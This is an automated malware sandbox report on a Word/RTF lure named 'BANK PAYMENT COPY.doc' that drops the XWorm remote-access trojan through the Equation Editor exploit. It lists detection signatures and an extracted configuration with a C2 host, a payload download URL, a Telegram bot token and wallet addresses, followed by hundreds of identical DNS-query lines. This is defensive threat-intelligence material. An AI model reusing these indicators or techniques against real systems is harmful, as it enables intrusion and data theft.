Windows Analysis Report
BANK PAYMENT COPY.doc

Overview

General Information

Sample name: BANK PAYMENT COPY.doc
Analysis ID: 1517840
MD5: 2ac91d79a602fe37092bd6f878f4ae2d
SHA1: dfebe627e262e9edf9ee1fe2ebc706f4bd1356d3
SHA256: 30096d5c8c4854311558a13ab825884fa3accfb27de30f3e2ba85e70bf0f6ab7
Tags: docuser-abuse_ch
Infos:

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

barindex
Source: BANK PAYMENT COPY.doc Avira: detected
Source: http://66.63.187.123/txt/vnobizxc.exe Avira URL Cloud: Label: malware
Source: 00000005.00000002.427670214.0000000002651000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["various-wages.gl.at.ply.gg"], "Port": "55202", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.4", "Telegram URL": "https://api.telegram.org/bot7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q/sendMessage?chat_id=985088883"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vnobizxc[1].exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe ReversingLabs: Detection: 50%
Source: BANK PAYMENT COPY.doc ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vnobizxc[1].exe Joe Sandbox ML: detected
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack String decryptor: various-wages.gl.at.ply.gg
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack String decryptor: 55202
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack String decryptor: <123456789>
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack String decryptor: <Xwormmm>
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack String decryptor: XWorm V5.4
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack String decryptor: USB.exe
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack String decryptor: bc1q4ul0exh4vcd9z9fchkyc5rud8dtwsgkugpg2hu
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack String decryptor: 0xBAD33b9Ee3C66782641D7662A66557A167543AB8
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack String decryptor: TQHfQNjDo2mPrBMghaWA6fZLJ6zHLwXKn5
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack String decryptor: 7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack String decryptor: 985088883

Exploits

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 66.63.187.123 Port: 80 Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\obibingf24242.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\obibingf24242.exe Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49164 version: TLS 1.2
Source: Binary string: fSgG.pdbSHA256 source: EQNEDT32.EXE, 00000002.00000002.420099253.000000000028F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.420099253.00000000002ED000.00000004.00000020.00020000.00000000.sdmp, obibingf24242.exe, 00000005.00000000.419128523.00000000011E2000.00000020.00000001.01000000.00000004.sdmp, obibingf24242.exe.2.dr, vnobizxc[1].exe.2.dr
Source: Binary string: fSgG.pdb source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.420099253.000000000028F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.420099253.00000000002ED000.00000004.00000020.00020000.00000000.sdmp, obibingf24242.exe, 00000005.00000000.419128523.00000000011E2000.00000020.00000001.01000000.00000004.sdmp, obibingf24242.exe.2.dr, vnobizxc[1].exe.2.dr

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: global traffic DNS query: name: api.telegram.org
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
Source: global traffic DNS query: name: various-wages.gl.at.ply.gg
